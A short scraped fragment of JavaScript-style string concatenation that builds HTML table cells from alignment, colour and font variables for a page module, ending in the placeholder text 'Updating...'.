+ column1_align_Module1 + '" valign="' + column1_valign_Module1 + '" height="' + column1_height_Module1 + '" bgcolor="' + column1_bgcolour_Module1 + '">' + font_column1_Module1 + ' +lid_Module1+'">' + lid_Module1 + '	+ column2_align_Module1 + '" valign="' + column2_valign_Module1 + '" height="' + column2_height_Module1 + '" width="' + column2_width_Module1 + '" bgcolor="' + column2_bgcolour_Module1 + '"> + lid_Module1 + '">' + font_column2_Module1 + 'Updating...